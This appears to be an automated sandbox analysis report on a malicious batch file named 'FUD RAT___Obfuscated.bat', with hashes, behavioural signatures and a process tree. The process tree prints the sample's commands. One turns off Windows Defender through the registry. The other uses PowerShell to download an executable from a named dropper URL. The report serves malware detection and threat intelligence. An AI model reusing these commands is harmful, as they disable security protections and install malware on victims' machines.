Analysis
-
max time kernel
16s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
24-12-2024 17:24
Static task
static1
Behavioral task
behavioral1
Sample
FUD RAT___Obfuscated.bat
Resource
win7-20240903-en
windows7-x64
6 signatures
150 seconds
Behavioral task
behavioral2
Sample
FUD RAT___Obfuscated.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
13 signatures
150 seconds
General
-
Target
FUD RAT___Obfuscated.bat
-
Size
463B
-
MD5
a9fdda2577ff67660be21d0d4cd98179
-
SHA1
15432871fed4cbb19ec26eaabcc6b193beebbbfb
-
SHA256
8f18705cf5653667888ea5f2440e984d22c5207e7e5e2fccb68e7ad71f58bb83
-
SHA512
0f43e8b47bdd9d1a2ce65db49868f7698b83bcb5f8d249a29078793e5ca48d75bf8ce99dae00f772c28b766ac761040c0113d9034e7e7d35efb75b39eca5153d
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://whatsabool.online/kingvonpiracyvirus/load.exe
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2832 powershell.exe 6 2832 powershell.exe -
pid Process 2832 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2832 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2832 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2684 wrote to memory of 2828 2684 cmd.exe 32 PID 2684 wrote to memory of 2828 2684 cmd.exe 32 PID 2684 wrote to memory of 2828 2684 cmd.exe 32 PID 2684 wrote to memory of 2832 2684 cmd.exe 33 PID 2684 wrote to memory of 2832 2684 cmd.exe 33 PID 2684 wrote to memory of 2832 2684 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\FUD RAT___Obfuscated.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:2828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://whatsabool.online/kingvonpiracyvirus/load.exe', 'C:\Users\Admin\AppData\Local\Temp\load.exe')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832
-